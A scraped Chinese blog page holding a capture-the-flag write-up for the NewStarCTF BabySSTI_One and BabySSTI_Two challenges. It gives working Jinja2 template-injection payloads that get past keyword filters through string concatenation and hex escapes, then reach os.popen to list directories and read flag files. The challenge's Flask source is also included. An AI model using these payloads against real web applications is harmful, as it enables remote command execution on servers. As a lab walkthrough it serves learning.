当前位置: 首页 > news >正文

网站规划内容杭州做网站哪家好

news 2025/10/9 16:52:12
网站规划内容,杭州做网站哪家好,天水做网站电话,给一个公司做网站需要多久[NewStarCTF 公开赛赛道]BabySSTI_One 测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用 可以考虑拼接或者编码,这里使用拼接 ?name{{()["__cla"~"ss__"]}}?name{{()["__cla"~"ss__"]["__ba&…

[NewStarCTF 公开赛赛道]BabySSTI_One

测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用

可以考虑拼接或者编码,这里使用拼接


?name={{()["__cla"~"ss__"]}}



?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()}}

 直接命令执行


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ls")["read"]()}}


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ca"~"t"~" "~"app*")["read"]()}}

from flask import Flask, request 
from jinja2 import Template 
import re 
app = Flask(__name__) 
@app.route("/") 
def index(): name = request.args.get('name', 'CTFer') if not re.findall('class|base|init|mro|flag|cat|more|env', name): t = Template("Welcome to NewStarCTF, Dear " + name + "Try to GET me a NAME") return t.render() else: t = Template("Get Out!Hacker!") return t.render() 
if __name__ == "__main__": app.run()

根目录下


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("tac /fla*")["read"]()}}

[NewStarCTF 公开赛赛道]BabySSTI_Two

burp测一下过滤哪些

过滤了这些内容,可用如下

尝试十六进制编码绕过


?name={{()['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']}}

 

 


#{{()['__class__']['__base__']['__subclasses__']()}}
{{()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()}}


name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('ls')['\x72\x65\x61\x64']()}}#    {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls')['read']()}}

 

 flag在根目录下


?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x6c\x73\x20\x2f')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls /')['read']()}}?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x5f\x69\x6e\x5f\x68\x33\x72\x33\x5f\x35\x32\x64\x61\x61\x64')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('cat /flag_in_h3r3_52daad')['read']()}}

http://www.dtcms.com/a/459088.html

相关文章:

  • 无锡建设主管部门网站wordpress 图片显示不了
  • 做海报挣钱的网站怎么使用电脑是做网站
  • 购物网站建设情况汇报四级作文模板万能
  • 秸秆还田下土壤有机质的激发效应
  • 个人做电子商务网站.net网站吃内存
  • 盐城那里做网站好点能做wordpress的网站
  • C# 泛型(Generic)
  • 从winlogon!SignalManagerWaitForSignal来看神秘的状态机的状态数组结构
  • 海门建设局网站能查个人信息的网站
  • 西安企业网站建设公司创办个人网站
  • 开锁公司网站建设o2o的网站有哪些
  • 郑州营销网站建设公司营销型网站建站步骤是什么意思
  • 免费下载ppt模板网站有哪些安徽质量工程建设网站
  • 龙岩e网站个人建什么样的网站好
  • 商城网站前置审批网站建设 验证码
  • C++十进制转二进制
  • 企业文化简介网站怎么做十大微商推广平台
  • 岱岳区网站设计手机可填写简历模板免费
  • 商品网站怎么做的2018做网站开发一个月工资多少
  • dw怎么做网站相册网站为什么要更新
  • 网站可以做多少优化关键词官方网站建设 省心磐石网络
  • POS机网站怎么做网站开发基本流程ppt
  • 做网站的属于什么专业网站电子商务平台建设
  • 网站开发 评价渭南华阴建设银行的网站是多少
  • 佛山建网站浙江外贸网站建设
  • 墨西哥网站后缀湛江仿站定制模板建站
  • cursor unable to write program user data 解决方法
  • 网站建设费能算作无形资产吗住房和城乡建设部关于资质延期
  • 专门做前端项目的一些网站响水县住房和城乡建设局网站
  • 描述个人网站的建站过程销售一个产品的网站怎么做